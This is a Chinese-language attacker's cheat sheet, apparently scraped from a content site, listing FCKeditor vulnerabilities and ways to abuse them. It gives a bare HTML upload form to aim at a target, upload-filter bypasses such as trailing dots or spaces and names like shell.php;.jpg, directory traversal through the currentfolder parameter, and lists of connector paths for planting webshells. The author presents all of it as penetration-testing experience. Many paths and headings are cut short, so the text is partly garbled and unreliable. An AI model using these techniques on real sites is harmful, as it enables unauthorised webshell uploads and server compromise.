檢視編輯器版本
fckeditor/_
—————————————————————————————————————————————————————————————
2. version 2.2 版本
apache+linux 環境下在上傳檔案後面加個.突破!測試通過。
—————————————————————————————————————————————————————————————
ion <=2.4.2 for php 在處理php 上傳的地方並未對media 型別進行上傳檔案型別的控制,導致使用者上傳任意檔案!將以下儲存為html檔案,修改action地址。
<form id="frmupload" enctype="multipart/form-data"
action="" method="post">upload a new file:<br>
<input type="file" name="newfile" size="50"><br>
<input id="btnupload" type="submit" value="upload">
</form>
—————————————————————————————————————————————————————————————
ditor 檔案上傳“.”變“_”下劃線的繞過方法
很多時候上傳的檔案例如: 或shell.php;.jpg 會變為shell_php;.jpg 這是新版fck 的變化。
4.1:提交+空格繞過
不過空格只支援win 系統 *nix 是不支援的[ 和+空格是2 個不同的檔案 未測試。
4.2:繼續上傳同名檔案可變為shell.php;(1).jpg 也可以新建一個資料夾,只檢測了第一級的目錄,如果跳到二級目錄就不受限制。
—————————————————————————————————————————————————————————————
5. 突破建立資料夾
fckeditor/editor/filemanager/connectors/asp/
fckeditor/editor/filemanager/browser/default/connectors/asp/
—————————————————————————————————————————————————————————————
6. fckeditor 中test 檔案的上傳地址
fckeditor/editor/filemanager/browser/default/connectors/
fckeditor/editor/filemanager/upload/
fckeditor/editor/filemanager/connectors/
fckeditor/editor/filemanager/connectors/
—————————————————————————————————————————————————————————————
7.常用上傳地址
fckeditor/editor/filemanager/browser/default/connectors/asp/
fckeditor/editor/filemanager/browser/default/
fckeditor/editor/filemanager/browser/default/ (ver:2.6.3 測試通過)
jsp 版:
fckeditor/editor/filemanager/browser/default/
注意紅色部分修改為fckeditor 實際使用的指令碼語言,藍色部分可以自定義文
件夾名稱也可以利用../..目錄遍歷,紫色部分為實際網站地址。
—————————————————————————————————————————————————————————————
8.其他上傳地址
fckeditor/_samples/
fckeditor/_samples/asp/
fckeditor/_samples/asp/
fckeditor/_samples/asp/
fckeditor/_samples/asp/
一般很多站點都已刪除_samples 目錄,可以試試。
fckeditor/editor/ 不可以上傳檔案,可以點選上傳圖片按鈕再選擇瀏覽伺服器即可跳轉至可上傳檔案頁。
—————————————————————————————————————————————————————————————
9.列目錄漏洞也可助找上傳地址
version 2.4.1 測試通過
修改currentfolder 引數使用 ../../來進入不同的目錄
/browser/default/connectors/aspx/
根據返回的xml 資訊可以檢視網站所有的目錄。
fckeditor/editor/filemanager/browser/default/connectors/aspx/
也可以直接瀏覽碟符:
jsp 版本:
fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?command=getfoldersandfiles&type=¤tfolder=%2f
—————————————————————————————————————————————————————————————
10.爆路徑漏洞
fckeditor/editor/filemanager/browser/default/connectors/aspx/
—————————————————————————————————————————————————————————————
11. fckeditor 被動限制策略所導致的過濾不嚴問題
影響版本: fckeditor x.x <= fckeditor v2.4.3
脆弱描述:
fckeditor v2.4.3 中file 類別預設拒絕上傳型別:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
fckeditor 2.0 <= 2.2 允許上傳asa、cer、php2、php4、inc、pwml、pht 字尾的檔案上傳後它儲存的檔案直接用的$sfilepath = $sserverdir . $sfilename,而沒有使用$sextension 為字尾.直接導致在win 下在上傳檔案後面加個.來突破[未測試]!
而在apache 下,因為"apache 檔名解析缺陷漏洞"也可以利用之,另建議其他上傳漏洞中定義type 變數時使用file 類別來上傳檔案,根據fckeditor 的程式碼,其限制最為狹隘。
在上傳時遇見可直接上傳指令碼檔案固然很好,但有些版本可能無法直接上傳可以利用在檔名後面加.點或空格繞過,也可以利用XX 解析漏洞建立xxx.asp資料夾或者上傳xx.asp;.jpg!
—————————————————————————————————————————————————————————————
12.最古老的漏洞,type檔案沒有限制!
我接觸到的第一個fckeditor漏洞了。版本不詳,應該很古老了,因為程式對type=xxx 的型別沒有檢查。我們可以直接構造上傳把type=image 改成type=hsren 這樣就可以建立一個叫hsren的資料夾,一個新型別,沒有任何限制,可以上傳任意指令碼!
—————————————————————————————————————————————————————————————
以上方法都是網上收集和在平時滲透中所總結的經驗,可能有些有遺漏,當再想起的時候再補充,也有自己沒發現的就要靠各位大俠分享學習了!
三優範文網